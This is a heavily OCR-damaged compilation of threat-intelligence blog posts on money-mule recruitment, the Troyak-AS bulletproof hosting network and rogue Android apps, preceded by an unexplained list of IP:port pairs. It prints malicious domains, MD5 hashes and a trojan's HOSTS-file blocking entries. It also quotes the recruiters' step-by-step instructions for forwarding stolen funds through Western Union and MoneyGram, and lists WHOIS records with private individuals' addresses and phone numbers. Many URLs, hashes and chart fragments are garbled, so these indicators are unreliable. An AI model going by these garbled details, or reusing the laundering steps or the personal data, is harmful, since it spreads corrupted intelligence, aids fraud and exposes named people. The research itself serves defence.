79.100.9.81:14053 
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91.124.125.16:29914 


46.16.228.135:53473 


95.61.55.234:22974 


190.213.101.39:44376 


58.173.158.99:50821 


188.25.108.102:31047 


95.153.175.173:15563 


75.120.194.116:58001 


61.6.218.126:63291 


128.70.19.98:64296 


5.167.193.5:25861 


185.57.73.27:47892 


109.205.249.105:58449 


77.228.235.226:57715 


2.62.49.161:49001 


67.234.161.61:65228 


91.243.100.237:40431 


105.155.1.67:16084 


73.34.178.71:41864 


145.255.169.122:4612 


92.241.241.4:61613 


145.255.21.166:46596 


83.253.71.148:34016 


173.246.26.126:12988 


79.181.115.213:43853 
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46.237.69.97:50772 


86.159.67.146:48959 


213.100.105.54:52147 


178.45.129.126:45710 


188.78.232.53:39336 


70.82.20.41:11248 


88.132.82.254:52722 


85.198.154.126:35403 


89.67.245.2:21705 


95.76.128.209:36640 


61.242.114.3:6383 


79.112.156.169:10236 


95.25.111.173:40781 


108.36.82.254:57393 


88.8.84.79:56740 


118.36.49.220:59561 


60.197.149.187:12996 


86.26.224.104:39597 


120.61.161.250:10023 


151.249.239.173:6881 


86.178.212.41:28489 


95.180.244.144:48245 


111.171.83.212:52952 


122.164.99.166:1024 


201.110.110.63:19314 
5000 


79.100.52.144:54312 


194.219.103.45:24008 


178.89.171.19:10003 


124.12.192.197:6881 


92.96.186.112:31100 


207.216.138.62:6881 


194.8.234.230:51413 


92.220.24.133:6881 


2.134.203.233:6881 


122.169.237.54:17407 


36.232.153.137:16001 


130.43.123.202:45689 


86.73.45.54:56161 


37.215.93.59:27997 


78.154.164.176:42780 


5.10.134.6:50452 


98.176.222.50:61000 


93.54.90.126:1189 


220.81.46.201:51526 


39.41.111.173:7702 


41.111.41.122:19132 


211.108.64.209:20728 


178.66.212.41:14865 


182.187.103.45:57751 


118.41.230.79:52520 
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186.155.231.45:34294 
109.174.113.128:15947 
188.6.88.229:16785 
99.247.58.79:23197 
94.137.237.54:14617 
197.203.129.67:10204 
5.107.65.67:21618 
117.194.114.71:64476 
94.153.45.54:32715 
2.176.158.50:17404 
5.18.178.71:50971 
78.130.212.41:63075 
86.121.45.54:55858 
109.187.1.67:15413 
108.199.125.160:38558 
83.181.18.121:15859 
93.109.242.198:26736 
95.86.220.68:27877 
37.204.22.24:24146 


198.203.28.43:17685 


What’s particularly interesting, about this campaign, is the fact, that, the Terms of Ser- 
vice (ToS) presented to gullible and socially engineered end users, refers to a well known 
Web site (jmobi.net), directly connected with the market leading [11]DIY APl-enabled mobile 
malware generating/monetization platform, extensively profiled in a previously published 
post. 
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As cybercriminals continue to achieve a cybercrime-ecosystem wide [12]standardization, 
we'll continue to observe an increase in fraudulent activity, with the cybercriminals behind 
it, continuing to innovate, on their way to achieve efficient monetization schemes, and 
risk-forwarding centered fraudulent models, further contributing to the adaptive innovation to 
be applied to the current [13]TTPs (tactics, techniques and procedures) utilized by them. 


1. http://www.webroot.com/blog/2013/09/18/affiliate-network-mobile-malware- impersonates-google-play-tricks- 


sers-installing-premium-rate-sms-sending-rogue-apps/ 


2. http://www.webroot .com/blog/2013/10/08/newly-1launched-vds-based-cybercrime-friendly-hosting-provider-help 


s-facilitate-fraudulentmalicious-online-activity/ 


ttp://ddanchev.blogspot.com/2013/08/profiling-novel-high-profit-margins.htm 


. http://ddanchev. blogspot .com/2013/11/fake-chromefirefoxinternet.html 


ttp://ddanchev.blogspot.com/2013/11/a-peek- inside-customer-ized-api-enabled.htm 


ttp://ddanchev.blogspot.com/2013/09/rogue- iframe-injected-web-sites-lead-to.htm 


; 

9. 
10. 
11. http://ddanchev. blogspot .com/2013/11/a-peek-inside-customer-ized-api-enabled. htm 

12. 

13. 


Ok Ol 


© 
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2015 


11.1 July 


11.1.1 Assessing The Computer Network Operation (CNO) Capabilities of the Islamic 
Republic of Iran - Report (2015-07-29 14:45) 
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GET 
READ Y 
TO 
EXPOSE 
IRAN 


WHO'S WHO ON WHO'S BUYING 
IRAN'S CYBER THEM BOOKS? 
WARFARE SCENE? An-depth 


tically relevant 
flran's 
jarfare 
doctrine 


HOW DO THEY 
OWN AND 
COMPROMISE? 


The most comprehensive 
r 


warfare scene ever 
performed 


WHERE DO THEY 
GO TO SCHOOL? 


epth analys 


ANALYSIS BY DANCHO DANCHEV - REPORT PRICE - $500 


Dear blog readers, | would like to let you know, of my latest, publicly released report, 
on the topic of "[1]Assessing The Computer Network Operation (CNO) Capabilities of the 
Islamic Republic of Iran", a comprehensive, 45 pages, assessment, of Iran’s cyber warfare 
scene, featuring exclusive, never-published before, assessments of the country’s cyber war- 
fare doctrine, analysis of the country’s academic incubators of the next generation of cyber 
warriors, featuring, an exclusive, social network analysis (SNA), of Iran’s hacking scene. 
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The report, answers the following questions: 


¢ Who’s who on Iran’s Cyber Warfare Scene - the most comprehensive analysis of Iran’s 
cyber warfare scene, ever performed 


¢ Where do they go to school? - in-depth analysis of Iran’s academic incubators of the next 
generation of cyber warriors 


¢ Who’s buying them books? - in-depth geopolitically relevant analysis of Iran’s cyber war- 
fare doctrine 


¢ How do they own and compromise? - complimentary copies of hacking tools, E-zines, 
academic papers, SNA (Social Network Analysis) of Iran’s Hacking Scene 


An excerpt from the Executive Summary: 


"Today’s growing cyber warfare arms race, prompts for systematic, structured, and mul- 
tidisciplinary enriched processes to be utilized, in order to anticipate/neutralize and properly 
attribute an adversary’s strategic, tactical and operational Computer Network Operation 
(CNO) capabilities, so that an adequate response can be formulated and executed on the 
basis of a factual research answering some of the most relevant questions in the fifth domain’ 
of warfare - who are our adversaries, what are they up to, when are they going to launch an 
attack against us, how exactly are they going to launch it, and what are they going to target 
first? 


This qualitative analysis (45 pages) seeks to assess the Computer Network Operations 
(CNO) of Islamic Republic of Iran, through the prism of the adversary’s understanding of 
Tactics, Techniques and Procedures (TTP), a structured and geopolitically relevant, enriched 
OSINT assessment of their operations, consisting of interpreted hacking literature, videos, and, 
custom made hacking tools, extensive SNA (Social Network Analysis) of the country’s Hacking 
Ecosystem, real-life personalization of the key individuals behind the groups (personally 
identifiable photos, personal emails, phone numbers, Blogs, Web Sites, Social Networking 
accounts etc.). It’s purpose is to ultimately empower decision/policy makers, as well as 
intelligence analysts, with recommendations for 


countering Islamic Republic of Iran’s growing understanding and application of CNO tac- 
tics and strategies." 


Request, your, complimentary, copy, of, the, report, by, approaching, me, dan- 
cho.danchev@hush.com 
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Enjoy! 
1. https://dl.packetstormsecurity.net/papers/general/Iran.ra 


11.2 August 


11.2.1 Historical OSINT: OPSEC-Aware Sprott Asset Management Money Mule Re- 
cruiters Recruit, Serve Crimeware, And Malvertisements (2015-08-27 16:02) 


Cybercriminals continue multitasking, on their way to take advantage of well proven fraudulent 
revenue sources, further, positioning themselves as opportunistic market participants, gen- 
erating fraudulent revenues, [1]standardizing and innovating within the context of [2]OPSEC 
(Operational Security) while enjoying a decent market share within the [3]cybercrime ecosys- 
tem. 


org 


127.0.0.1 aic.gov-.au 


In this post, I'll profile a [4]money mule recruitment campaign, featuring a custom fake 
certificate, successfully blocking access to [5]bobbear.co.uk as well as my personal blog, 
further exposing [6]a malicious infrastructure, that I'll profile in this post. 


Let’s assess the campaign, and expose the malicious infrastructure behind it. 


The fake Sprott Asset Management sites, entices end users into installing the, the fake, 
malicious certificate, as a prerequisite, to being working with them, with hosting courtesy of 
ALFAHOSTNET (AS50793), a well known cybercrime-friendly malicious hosting provider, known, 
to have been involved in a variety of malvertising campaigns, including related malicious 
campaigns, that I'll expose in this post. 
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Sprott Asset Management *** Secure Transaction Certificate has been successful installed, **** 


Domain name reconnaissance for the malicious hosting provider: 


alfa-host.net - (AS50793) - Email: alitalaghat@gmail.com; Name: Mohmmad Ali Talaghat 
(webalfa.net - 78.47.156.245 also registered with the same email) 


Name Server: NS1.ALFA-HOST.NET 


Name Server: NS2.ALFA-HOST.NET 


Alfa-host LLP - (AS50793) 
person: Romanov Artem Alekseevich 
phone: +75.332211183 


address: Kazakhstan, Karagandinskaya obl, Karaganda, ul. Erubaeva 57, 14 


Upstream provider reconnaissance: 
LLC TC "Interzvyazok" 

Hvoiki 15/15 

04080 Kiev 

UKRAINE 

phone: +380 44 238 6333 

fax: +380 44 238 6333 


e-mail: dz (at) intersv (dot) com 
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The same upstream provider (Interzvyazok; intersv.com) is also known to have offered 
services to [7]yet another bulletproof hosting provider in 2011. 


crackinglab.org 
info.sprottcareers.com 


info.sprottcorporate.com 
x 


4 > 
info.sprottweb.com 4 C 88.212.221.46 NET 98.212.192.0/18 AS. AS39134 
an 


WX 


mail.crackinglab.org 
mail.sarga.ru 


Sarga.ru 


Domain name reconnaissance: 

sprottcareers.com - 193.105.207.105; 88.212.221.46 
sprottcorporate.com - 193.105.207.105; 88.212.221.46 
sprottcorporate.com - 92.241.162.58 


sprottweb.com - 193.105.207.105; 88.212.221.46 
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allianceassetonline.com 


ns2.allianceassetonline.com NS 


~— NET AS 
AC 92.241.162.58 92.241.160.0/19 AS41947 
~~ 


ns2.sprottcorporate.com 


ns2.uptusconsulting.net 


Domain name reconnaissance: 
allianceassetonline.com - 92.241.162.58 
allianceassetweb.com - 88.212.221.41 


uptusconsulting.net - Email: terrizziboris@googlemail.com - 92.241.162.58 


Known to have responded to the same IP (193.105.207.105) are also the following ma- 
licious domains:auditthere.ru 


maccrack.ru 
nissanmoto.ru 
megatuz.ru 
basicasco.ru 
megatuz.ru 
foreks999.ru 
monitod.ru 
peeeeee.ru 
fra8888.ru 
inkognittto.ru 


lavandas.ru 
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Related MD5s known to have phoned back to the same IP (193.105.207.105):MD5: 
a9442b894c61d13acbac6c59adc67774 


MD5:7fd31163fe7d29c61767437b2b1234cd 
MD5:d90de03caa80506307fc05a0667 246ef 
MD5:09241426aac7a4aae12743788ce4cff4 
MD5:cb74fb88f36b667e26f41671de8e1841 
MD5:8efd31e0f3c251a3c7ef63b377edbf9c 

MD5:a750359c72de3fc38d2af2670fd1a343 
MD5:fOcbef01f5bd1c075274533f164bb06f 


MD5:398b06590179be83306b59cea9da79e5 


Related malicious domains known to have been active within (AS50793), ALFAHOST- 
NET:34real.ru 


3pulenepro.net 
3weselchak.net 
analizes.ru 
appppal.ru 
arbuz777.ru 
arsenalik.ru 
assolo.ru 
astramani.ru 
basicasco.ru 
bits4ever.ru 
bonokur.ru 
boska7.ru 


chudachok9.ru 
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cosavnos.ru 
dermidom44.ru 
drtyyyt.ru 
dvestekkk.ru 
ferdinandi.ru 
ferzipersoviy.ru 
foreks999.ru 
fra8888.ru 
globus-trio.ru 
google-stats.ru 
horonili.ru 
inkognittto.ru 
karlito777.ru 
lavandas.ru 
ma456.ru 
medriop56.ru 
megatuz.ru 
mnobabla.ru 
monitod.ru 
offshoreglobal.ru 
okrison.com 
opitee.ru 
otrijek.ru 
peeeeee.ru 


pohmaroz44.ru 
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postmetoday.ru 
reklamen6.ru 
reklamen7.ru 
rrrekti.ru 
sekretfive.ru 
stolimonov.ru 
sworo.ru 
trio4.ru 
update4ever.ru 
victorry.ru 
vivarino77.ru 
vopret.ru 


wifipoints.ru 


Known to have responded to the same IP (88.212.221.46) in the past, are also the fol- 
lowing malicious domains: 


liramdelivery.com - Email: carlyle.jeffrey@gmail.com 
ffgroupjobs.com - Email: FfGroupJjobs@dnsname. info 


secretconsumeril.com 


Name servers: 
ns2.uptusconsulting.net - 92.241.162.58 
ns2.sprottcorporate.com - 92.241.162.58 


ns2.sprottweb.com - 92.241.162.58 
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allianceassetweb.com - Email: martins.allianceam@gmail.com 


Surprise, surprise. We've also got the [8]following fraudulent [9]domains, responding 
[1LO]to the same [11]name server’s IP (92.241.162.58; ns1.oildns.net, ns2.oildns.net) back in 
2009. 


What’s particularly interesting, is the fact, that in 2010, we’ve also got (92.241.162.58) 
hosting the following malicious MD5s: 


MD5: 8ee5435004ad523f4cbe754b3ecdb86e 


MD5: 38f5e6a59716d651915a895c0955e3e6 


We’ve also got ns1.oildns.net responding to (93.174.92.220), with the actual name server, 
known to have hosted, the following malicious MD5s: 


MD5: 5ae4b6235e7ad1bfle3c173b907def17 


Sample detection rate for the malicious certificate: 


[12]MD5: ec39239accbO0edb5fb923c25ffc81818 - detected by 23 out of 42 antivirus scanners 
as Gen:Trojan.Heur.SFC.juZ@aC7UB8eib 


Sprott Asset Management *** Secure Transaction Certificate has been 


successful installed. **** 
OK 


Sample detection rate for the HOSTS file modifying sample: 


[13]MD5: 969001fcc1d8358415911db90135fa84 - detected by 14 out of 42 antivirus 
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scanners as Trojan.Generic.4284920 


Once executed, the sample successfully modifies, the HOSTS file on the affected hosts, 
to block access to: 


127.0.0.1 google.com 

127.0.0.1 google.co.uk 

127.0.0.1 www.google.com 
127.0.0.1 www.google.co.uk 
127.0.0.1 suckerswanted.blogspot.com 
127.0.0.1 ideceive.blogspot.com 
127.0.0.1 www.bobbear.co.uk 
127.0.0.1 bobbear.co.uk 
127.0.0.1 reed.co.uk 

127.0.0.1 seek.com.au 

127.0.0.1 scam.com 

127.0.0.1 scambusters.org 
127.0.0.1 www.guardian.co.uk 
127.0.0.1 ddanchev.blogspot.com 
127.0.0.1 aic.gov.au 

127.0.0.1 google.com.au 
127.0.0.1 www.reed.co.uk 
209.171.44.117 www.sprott.com 
209.171.44.117 sprott.com 
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Sprott / Asset Management” 


Please leg in 


(Zz User name 
. Password 
Mew reaistration forest password? 


Log in 
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, 
Sprott . Asset Management” 


Age Of Account 


For BPAY payments please credit 
Card number inked to Your bank account you 


Credit Card Number (000 300K XXXX 2000X) 


Sprott Asset Management 


Step 2 from 4 


United States 

Probationary Period Policy: 

[CARE AS THESE GOVERN ANY USE OF OR ACCESS TO THIS WEBSITE. BY 
PROCEEDING FURTHER YOU ACCEPT THEM. IF YOU DO NOT ACCEPT THESE TERMS © 
AND CONDITIONS OF USE YOU ARE NOT AUTHORISED TO PROCEED FURTHER AND 
SHOULD EXIT THIS WEBSITE. 


i. Basis of Use 

1.1 Information appearing on this website is provided in accordance 
with and subject to the laws of Canada and you are hereby advised 
that, by virtue of your browsing or accessing this website you have 
accepted the laws of Canada as the law governing the conduct and 
Operation of this website. The courts of Canada shall have exclusive 
Jurisdiction over a2) claims or Gisputes arising in relation tc, out 


Detailed Job Description: 

WORKING PROCESS 

During all working process you will process incoming and outgoing F 
transfers from our clients. Main duties are: send payments, receive 
payments, making records of billing, making simple management 

duties, checking e-mail daily. You have te provide us your cell 

phone for urgent calls frcm your manager. If you don’: have a cell 
phone you will seed to buy it. You must have basic computer skills 

tO Operate main process of $cb duties. 


SALARY 
During the trial period (1 month), you will be paid 4,600$ per month 
while working on average 3hours per day, Monday-Friday, pius 8% 


[__tatsooree ][_teoree_] 


Sprott Asset Management 
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Sample confirmation email courtesy of Sprott Asset Management: 


WORKING PROCESS 

During all working process you will process incoming and outgoing transfers from our clients. 
Main duties are: send payments, receive payments, making records of billing, making simple 
management duties, checking e-mail daily. You have to provide us your cell phone for urgent 
calls from your manager. If you don’t have a cell phone you will need to buy it. You must have 
basic computer skills to operate main process of job duties. 


SALARY 

During the trial period (1 month), you will be paid 4,600 $ per month while working on average 
3hours per day, Monday-Friday, plus 8 % commission from every payment received and 
processed. The salary will be sent in the form of wire transfer directly to your account or you 
may take it from received funds directly. After the trial period your base pay salary will go up 
to 6,950 $ per month, plus 10 % commission. 


FEES & TRANSFERING PROCEDURE 

All fees are covered by the company. The fees for transferring are simply deducted from the 
payments received. Customer will not contact you during initial stage of the trial period. After 
three weeks of the trial period you will begin to have contact with the customers via email in 
regards to collection of the payments. For the first three weeks you will simply receive all of 
the transferring details, and payments, along with step by step guidance from your supervisor. 
You will be forwarding the received payments through transferring agents such as Western 
Union, Money Gram, any P2P agents or by wire transferring. 


WESTERN UNION & MONEYGRAM 

1. As soon as You receive money transfers from our clients you are supposed to cash it in your 
bank. 

2. You will need to pick up the cash physically at the bank, as well as a transfer to MoneyGram. 
3. Please use MoneyGram, located not in your bank, because this providing of anonymosty of 
our clients. 

4, The cashed amounts of money should be transferred to our clients via MoneyGram/Western 
Union. 

according to our transfer instructions except all the fees. The fees are taken from the amount 
cashed. 

5. Not use online service, only physical presence in an office of bank and Western Union. 

6. Just after you have transferred money to our clients, please contact your personal manager 
via e-mail (confirmation of the transfer) 

and let him (her) know all the details of your Western Union transfer: SENDER’S NAME, 
CONTACT DETAILS, ADRESS, AND A REFERENCE NUMBER, 

PLEASE BE VERY CAREFUL WHEN YOU RESEND FUNDS, THERE MUST BE NO MISTAKES, because 
our client will not be able to withdraw the funds. 

7. All procedures have to take 1-2 hours, because we have to provide and verify the safety of 
our clients‘ money (we have to inform them about all our actions). 


Your manager will support you in any step of application process, if you have any ques- 
tions you may ask it anytime. 
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Go through related research regarding money mule recruitment: 


¢ [14]Profiling a Novel, High Profit Margins Oriented, Legitimate Companies Brand-Jacking 
Money Mule Recruitment Scheme 


¢ [15]Spotted: cybercriminals working on new Western Union based ‘money mule manage- 
ment’ script 


¢ [16]Keeping Money Mule Recruiters on a Short Leash - Part Eleven 

¢ [17]Keeping Money Mule Recruiters on a Short Leash - Part Ten 

¢ [18]Keeping Money Mule Recruiters on a Short Leash - Part Nine 

¢ [19]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
¢ [20]Keeping Money Mule Recruiters on a Short Leash - Part Seven 

¢ [21]Keeping Money Mule Recruiters on a Short Leash - Part Six 

¢ [22]Keeping Money Mule Recruiters on a Short Leash - Part Five 

¢ [23]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
¢ [24]Keeping Money Mule Recruiters on a Short Leash - Part Four 

¢ [25]Money Mule Recruitment Campaign Serving Client-Side Exploits 

¢ [26]Keeping Money Mule Recruiters on a Short Leash - Part Three 

¢ [27]Money Mule Recruiters on Yahoo!’s Web Hosting 

¢ [28]Dissecting an Ongoing Money Mule Recruitment Campaign 

¢ [29]Keeping Money Mule Recruiters on a Short Leash - Part Two 

¢ [30]Keeping Reshipping Mule Recruiters on a Short Leash 

¢ [31]Keeping Money Mule Recruiters on a Short Leash 

¢ [32]Standardizing the Money Mule Recruitment Process 

¢ [33]lnside a Money Laundering Group’s Spamming Operations 

¢ [34]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


¢ [35]Money Mules Syndicate Actively Recruiting Since 2002 
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. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 
. http: //www.webroot .com/blog/tag/opsec/ 
. http: //www.webroot .com/blog/2013/12/27/cybercrime-trends-2013-year-review/ 


http: //ddanchev. blogspot .com/2013/08/profiling-novel-high-profit-margins.htm 


ttp://ddanchev. blogspot .com/2008/11/ddos-attack-against-bobbearcouk. htm 


| http:/ adanchev blogspot .con/2010/04/dns~infrastructure-of-noney-mule. heal 

| ketp://wwy. abuse. ch/7p-9130 

_ ictp:/ aww. bobbear co. uk/ivan-delivery-oorvice tal 

_etp://wwy, bobbesr co, uk/avicenna, ben 

10, fittp://wwr.bobbear co uk/anset~aanaganent~ company Ha] 

12. 
13, 


. http: //ddanchev.blogspot .com/2013/08/profiling-novel-high-profit-margins.htm 


. http: //ddanchev. blogspot .com/2013/08/profiling-novel-high-profit-margins.htm 


16. http: //ddanchev.blogspot.com/2011/08/keeping-money-mule-recruiters-on-short .htm 
17. http: //ddanchev.blogspot.com/2011/07/keeping-money-mule-recruiters-on-short .htm 


. http: //ddanchev.blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_30.htm 


. http: //ddanchev.blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_25.htm 


20. 
21. 
22. 
23, 


25. http: //ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving. htm 


26. http: //ddanchev. blogspot .com/2010/03/keeping-money-mule-recruiters-on-short.htm 


27. http://ddanchev. blogspot .com/2010/03/money-mule-recruiters-on-yahoos-web.htm 


28. http: //ddanchev. blogspot . com/2010/02/dissecting-ongoing-money-mule.htm 
29. http://ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short.htm 


24. http: //ddanchev. blogspot .com/2010/04/keeping-money-mule-recruiters-on-short.htm 


. http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


21 
32. 

. http: //ddanchev. blogspot .com/2009/05/inside-money- laundering-groups- spamming .htm. 
34, 
35. 


11.2.2 Historical OSINT - How TROYAK-AS Utillized BGP-over-VPN to Serve the 
Avalance Botnet (2015-08-28 16:15) 


Historical OSINT is a crucial part of an intelligence analyst’s mindset, further positioning 
a growing or an emerging trend, as a critical long term early warning system indicator, 
highlighting the importance, of current and emerging trends. 
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In this post, I’ll discuss Troyak-AS, a well-known cybercrime-friendly hosting provider, 
that represented, the growing factor, for the highest percentage of malicious and fraudulent 
activity online, throughout 2010, its upstream provider NetAssist LLC, and most importantly, 
a malicious innovation applied by cybercriminals, at the time, namely the introduction of 
malicious netblocks and ISPs, within the RIPE registry, relying on [1LJOPSEC (Operational 
Security) and basic evasive practices. 


According to RSA, the [2]Ukrainian based ISP NetAssist LLC is listed as a legitimate ISP, 
one whose services haven’t been abused in any particular cybercrime-friendly way. 


This analysis, will not only prove, otherwise, namely, that [3]NetAssist LLC’s involvement 
in introducing a dozen of [4]cybercrime friendly networks - including [5]TROYAK-AS - has 
been taking place for purely commercial reasons, with the ISP charging thousands of euros 
for the process, but also, expose a malicious innovation applied on behalf of [6]opportunistic 
cybercriminals, at the time, namely, the introduction of innovative bulletproof hosting tactics, 
techniques and procedures. 


Domain name reconnaissance: 


troyak.org - 74.208.21.227 (AS8560); 195.93.184.1 (AS44310) - ~ Email: 
staruy.rom@troyak.org; staruy.rom@inbox.ru 


smallshopkz.org - 195.78.123.1 (AS12570) 
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The site is closed for redesign 


For support and connection, please call: (095)2734191, e-mail:support@ctlan.net. 


Name servers: 
ns.troyak.org - 195.93.184.1 - (AS44307) ALYANSHIMIYA 


ns.bgpvpn.kz - 91.213.93.10 
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- 91.213.93.0:24 ——“S-gpe  as287 


uP 
: PTR 
s on + core.bgpvpniz 


ns.bgpypn.kez 


ns.smallshopkzorg ——“—p> 195.78,123.1 ——YELg 195.78.122.0:23 —“S-m as31366 


ns.smallshopkz.org (195.78.123.1) is also known to have offered DNS services, to prombd.net 
(AS44107) PROMBUDDETAL (AS50215 Troyak-as at the time responding to ctlan.net) - 
91.201.30.1, and vesteh.net (AS47560) VESTEH-NET 91.200.164.1 


Domain name reconnaissance: 


bgpvpn.kz 

Organization Using Domain Name 
Name..........::2::. Mykola Tabakov 
Organization Name......: : Mykola Tabakov 
Street Address.........: office 211, ul. Pushkina, dom 166 
City...c eee? Astana 
Staté........:.:...2 Astana 

Postal Code..........44: : 010000 

COUNTY sisxavtecszeent KZ 

Administrative Contact/Agent 

NIC Handle.............5 CA537455-RT 
NAIM Gis sissecdaccnetards : Mykola Tabakov 
Phone Number...........° : +7.7022065468 
Fax Number.............. +7.7022065468 
Email Address..........: tabanet@mail.ru 


Nameserver in listed order: 
Primary server.......... ns.bgpvpn.kz 
Primary ip address.....: 91.213.93.10 
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E-mail: 
Jabber 


Domain name reconnaissance: 


smallshopz. biz 

Domain Name:SMALLSHOPKZ.ORG 

Created On:30-Oct-2009 13:42:14 UTC 

Last Updated On:19-Mar-2010 14:39:19 UTC 
Expiration Date:30-Oct-2010 13:42:14 UTC 
Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com 
(R27-LROR) 

Status:CLIENT TRANSFER PROHIBITED 
Registrant ID:DI 10606443 

Registrant Name:Vladimir Vladimirovich Stebluk 
Registrant Organization:N/A 

Registrant Street1:off. 306, Bulvar Mira, 16 
Registrant Street2: 

Registrant Street3: 

Registrant City:Karaganda 

Registrant State/Province:Qaraghandyoblysy 
Registrant Postal Code:100008 

Registrant Country:KZ 

Registrant Phone:+7.7012032605 

Registrant Phone Ext.: 

Registrant FAX: 

Registrant FAX Ext.: 

Registrant Email:vladcrazy@smallshopkz.org 
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NetAssist LLC (netassist.ua) (AS29632) reconnaissance: 
inetnum: 62.205.128.0 - 62.205.159.255 

netname: UA-NETASSIST-20080201 

descr: NetAssist LLC 

country: VA 

org: ORG-NL64-RIPE 

admin-c: MT6561-RIPE 

admin-c: AVI27-RIPE 


tech-c: MT6561-RIPE 
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tech-c: APP18-RIPE 

status: ALLOCATED PA 
mnt-by: RIPE-NCC-HM-MNT 
mnt-lower: MEREZHA-MNT 
mnt-routes: MEREZHA-MNT 
mnt-domains: MEREZHA-MNT 


source: RIPE # Filtered 
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AS701S 
ATTINTERNETS 
AS2516 
KDI 


AS6453 
GLOBEINTERNET 


Ze 
<7 ON 


— AS9002 AS31366 AS12604 
RETINAS smaksnop-as ciygame-as 
AS6939 
HUPRICANE 


organisation: ORG-NL64-RIPE 

org-name: NetAssist LLC 

org-type: LIR 

address: NetAssist LLC 

Max Tulyev 

GEROEV STALINGRADA AVE APP 57 BUILD 54 
04213 Kiev 


UKRAINE 
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phone: +380 44 5855265 
fax-no: +380 44 2721514 
e-mail: info@netassist.kiev.ua 
admin-c: AT4266-RIPE 
admin-c: KS3536-RIPE 
admin-c: MT6561-RIPE 
mnt-ref: RIPE-NCC-HM-MNT 
mnt-ref: MEREZHA-MNT 
mnt-by: RIPE-NCC-HM-MNT 


source: RIPE # Filtered 
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AS7018 
ATTANTERNETS 


AS6453 
GLOBEINTERNET 

AS3257 x\ 
TINET-BACKBONE 


DQ KX 
Spa 


AS9002 AS8342 AS31366 
RETNAS RTCOMM.AS smalishop-as 


person: Max Tulyev 

address: off. 32, 12 Artema str., 
address: Kiev, Ukraine 
remarks: Office phones 

phone: +380 44 2398999 


phone: +7 495 7256396 
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phone: +1 347 3414023 

phone: +420 226020344 

remarks: GSM mobile phones, SMS supported 
phone: +7 916 6929474 

phone: +380 50 7775633 

remarks: Fax is in auto-answer mode 

fax-no: +380 44 2726209 

remarks: The phone below is for emergency only 
remarks: You can also send SMS to this phone 
phone: +88216 583 00392 

remarks: 

remarks: Jabber ID mt6561@jabber.kiev.ua 
remarks: SIP 7002@195.214.211.129 

e-mail: maxtul@netassist.ua 

e-mail: president@ukraine.su 

nic-hdl: MT6561-RIPE 

mnt-by: MEREZHA-MNT 


source: RIPE # Filtered 


person: Alexander V Ivanov 
address: 14-28 Lazoreviy pr 
address: Moscow, Russia 
address: 129323 

phone: +7 095 7251401 


fax-no: +7 095 7251401 
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e-mail: ivanov077@gmail.com 
nic-hdl: AVI27-RIPE 
mnt-by: MEREZHA-MNT 


source: RIPE # Filtered 


AS1668 
ATON 
AS6762 
SEABONE-NET 
AS6453 
GLOBEINTERNET 


AS6939 
te HURRICANE 
AS39287 i. 
TINET-BACKBONE 


AS12956 
Telefonica 
KDO! AS49278 
UKRDATACOM-NET-as 


AS28858 
Lecos 


aAs7018 
ATTINTERNETS 


<> 
Ce) 
Cam) 
Ca) 
Cae) 

Cts 
Ca) 
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person: Alexey P Panyushev 
address: 8-142, Panferova street 
address: Moscow, Russia 
address: 117261 

phone: +7 903 6101520 

fax-no: +7 903 6101520 

e-mail: panyushev@gmail.com 
nic-hdl: APP18-RIPE 

mnt-by: MEREZHA-MNT 


source: RIPE # Filtered 


Is NetAssist LLC, on purposely offering its services, for the purpose of orchestrating cybercrime- 
friendly campaigns, in a typical bulletproof cybercrime friendly fashion, or has it been abused, 
by an opportunistic cybercriminals, earning fraudulently obtained revenues in the process? 
Based on the analysis in this post, and the fact, that the company, continues offering IPv4 
RIPE announcing services, | believe, that on the majority of occasions, the company has had 
its services abused, throughout 2010, leading to the rise of the Avalance bothet. 


| expect to continue observing such type of abuse, however, in a [7]cybercrime ecosys- 
tem, dominated, by the abuse of legitimate services, | believe that cybercriminals will 
continue efficiently bypassing defensive measures in place, through the abuse and compro- 
mise of legitimate infrastructure. 


This post has been reproduced from [8]Dancho Danchev’s blog . 


http://www .webroot .com/blog/tag/opsec/ 
ttp://rsa.com/blog/blog_entry.aspx?id=1610 
ttps://www.abuse.ch/?p=241 


http: //ddanchev. blogspot .com/2010/05/avalanche-botnet-and-troyak-as.htm 


http: //www.webroot .com/blog/2013/12/27/cybercrime-trends-2013-year-review/ 
ttp://ddanchev. blogspot .com/ 
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2016 


12.1 April 


12.1.1 Hundreds of Google Play Apps Compromised, Lead to Mobile Malware 
(2016-04-24 17:17) 


Malicious attackers, have, managed, to, infiltrate, and populate, Google Play, with, hundreds, 
of rogue, applications, exposing, users, to mobile, malware, compromising, the, integrity, 
of, their, devices, and, exposing, them, to, misleading, advertisements. Once, a socially, 
engineered, user, obtains, the, application, and, execute, it, their, device, the malware, 
phones, back, to, a malicious URL, exposing, the, integrity, confidentiality, and, availability, of, 
the, device. 


Malicious attackers, often, rely, on, a variety of social engineering tactics, to, obtain, ac- 
cess, to, a user’s device, including, the use, of, compromised, publisher’s accounts, obtained, 
through, data mining, of botnet’s of infected, population. Once, access, to, a particular, pub- 
lisher’s account, is, obtained, the malicious attackers, would, attempt, to use, a do-it-yourself, 
type, of, mobile, malware, generating tool, for, the, purpose, of, modifying, a legitimate, 
application, for, the, purpose, of, obtaining, access, to, a user’s device. 


Malicious attackers, are, also, known, to rely, on secondary, marketplaces, for, the, pur- 
pose, of, attempting, to, obtain, access, to user’s, device, with, the, secondary, marketplaces, 
populated, with, rogue, and compromised, applications. 


Once, a, socially, engineered, user, obtains, an, application, their, device, automatically, 
becomes, part, of, a, malicious attacker’s, botnet, with, the malicious, attackers, relying on, 
a multitude, of monetization techniques, while, earning, fraudulently, obtained, revenue, 
in, the, process. Malicious attackers, are, also, known, to, rely, on, rogue, and, fraudulent, 
affiliate networks, for, the, purpose, of, monetizing, access, to, the, obtained, hosts, through, 
a, variety, of, rogue, advertising, networks, largely, set, up, for, the, purpose, of, earning, 
fraudulent, revenue, for, the, malicious attackers. 


5035 


